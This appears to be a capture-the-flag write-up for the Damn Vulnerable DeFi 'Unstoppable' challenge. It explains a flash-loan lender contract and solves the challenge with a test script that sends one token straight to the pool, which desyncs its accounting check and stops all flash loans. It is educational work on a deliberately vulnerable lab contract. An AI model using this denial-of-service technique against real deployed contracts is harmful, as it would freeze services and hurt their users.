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The goal is stop pool from offering flash loan. How does flash loan works? In simple terms, flash loan are broken down into 3 steps and to be completed in a single transaction. 1) A loan from a pool of money is sent to receiver. 2) Receiver will use the money to execute a certain action from another smart contract. 3) Receiver will return the money with fixed rate (Something like an interest rate).


Code Breakdown

Let's start by breaking down the source code into functions. There are two files - UnstoppableLender.sol and ReceiverUnstoppable.sol. UnstoppableLender.sol will loan money to receiver and execute functions from ReceiverUnstoppable.sol.

However, we'll look at UnstoppableLender.sol primarily.

There are a few variables declared, one consutructors and two functions in the smart contract.

For starters, this contract mainly use damnValuableToken as their main currency - IERC20 public immutable damnValuableToken. Openzeppelin is used to create the token.


uint256 public poolBalance is created to store a pool token ready to be loaned.

Next, a constructor is called whenever the smart contract is deployed. Next, the tokens will be named as damnValuableToken.

constructor(address tokenAddress) {
    require(tokenAddress != address(0), "Token address cannot be zero");
    damnValuableToken = IERC20(tokenAddress);

It requires tokenAddress and it performs a check if the address is 0. This will ensure the address integrity.

Now, we can talk about the functions in question. Let's start with depositTokens.

function depositTokens(uint256 amount) external nonReentrant {
    require(amount > 0, "Must deposit at least one token");
    // Transfer token from sender. Sender must have first approved them.
    damnValuableToken.transferFrom(msg.sender, address(this), amount);
    poolBalance = poolBalance + amount;

The functions require amount to be specified and more than 0 when it's called. As part of an innate function from openzeppelin IERC20 , damnValuableToken.transferFrom(msg.sender, address(this), amount); will then transfer amount to address(this) from msg.sender. msg.sender = sender address (deployer). address(this) = receiver address (pool smart contract address). amount = amount of tokens deposited to pool.

poolBalance will be updated along with the new amount. Note that this is the only place where poolBalance can be updated.

Next, flashLoan is the main function to execute a flash loan.

function flashLoan(uint256 borrowAmount) external nonReentrant {
    require(borrowAmount > 0, "Must borrow at least one token");

    uint256 balanceBefore = damnValuableToken.balanceOf(address(this));
    require(balanceBefore >= borrowAmount, "Not enough tokens in pool");

    // Ensured by the protocol via the `depositTokens` function
    assert(poolBalance == balanceBefore);

    damnValuableToken.transfer(msg.sender, borrowAmount);

    IReceiver(msg.sender).receiveTokens(address(damnValuableToken), borrowAmount);

    uint256 balanceAfter = damnValuableToken.balanceOf(address(this));
    require(balanceAfter >= balanceBefore, "Flash loan hasn't been paid back");

I'll breakdown a few requirements quickly. require(borrowAmount > 0, "Must borrow at least one token"); = Amount borrowed must be more than 1 token. require(balanceBefore >= borrowAmount, "Not enough tokens in pool"); = Current amount of tokens in the pool must be more than amount borrowed. assert(poolBalance == balanceBefore); = Current amount of tokens in poolBalance must be the same before the flashloan. damnValuableToken.transfer(msg.sender, borrowAmount); = Token transferred to receiver. IReceiver(msg.sender).receiveTokens(address(damnValuableToken), borrowAmount); = Execute function in another contract ReceiverUnstoppable.sol.

During this function, tokens loaned to receiver will be returned to pool. require(balanceAfter >= balanceBefore, "Flash loan hasn't been paid back"); = Amount of tokens after loaned must be more than the amount of tokens before the loan


The goal is to stop the smart contract from functioning. Take a look at this section assert(poolBalance == balanceBefore);.

Technically, there exist 2 pool balance - 1 in UnstoppableLender.sol* and DamnValuableToken.sol**.

Notice that poolBalance must be equal to balanceBefore. These are the 2 pool balance poolBalance can only be increased from the function depositTokens. balanceBefore checks for the current tokens in the pool directly from DamnValuableToken.sol (openzeppelin innate function). Therefore, both variables are async. A simple solution is to transfer token directly into DamnValuableToken.sol to trigger a revert in assert(poolBalance == balanceBefore);.


Here's the solution (I've added 2 functions in ReceiverUnstoppable.sol to retrieve the number of tokens in the pool).

it('Exploit', async function () {
    //Before Transfer
    before_bal1 = await this.pool.getPoolBal();
    before_bal2 = await this.pool.getTokenBal();
    console.log("Before transfer:\nBalance from ReceiverUnstoppable.sol - ", before_bal1.toString());
    console.log("Balance from DamnValuableToken.sol - ", before_bal2.toString());

    //Transfer token to halt flashloan services
    console.log("Transferring 1 token to DamnValuableToken.sol pool");
    await this.token.transfer(this.pool.address, 1);

    //After Transfer
    after_bal1 = await this.pool.getPoolBal();
    after_bal2 = await this.pool.getTokenBal();
    console.log("After transfer:\nBalance from ReceiverUnstoppable.sol - ", after_bal1.toString());
    console.log("Balance from DamnValuableToken.sol - ", after_bal2.toString());

Functions added to reflect the result below

function getPoolBal() public view returns (uint256){
    return poolBalance;

function getTokenBal() public view returns (uint256){
    uint256 balanceBefore = damnValuableToken.balanceOf(address(this));
    return balanceBefore;

Here's the result

Before transfer:
Balance from ReceiverUnstoppable.sol -  1000000000000000000000000
Balance from DamnValuableToken.sol -  1000000000000000000000000
Transferring 1 token to DamnValuableToken.sol pool
After transfer:
Balance from ReceiverUnstoppable.sol -  1000000000000000000000000
Balance from DamnValuableToken.sol -  1000000000000000000000001


By no means you should ever need two set of pools. For the sake of this challenge, one simple solution is to sync poolBalance and damnValuableToken.balanceOf(address(this)) whenever a new token is transferred into either pool. Although it will create a whole new magntitude of problem but hey, at least its solved. :)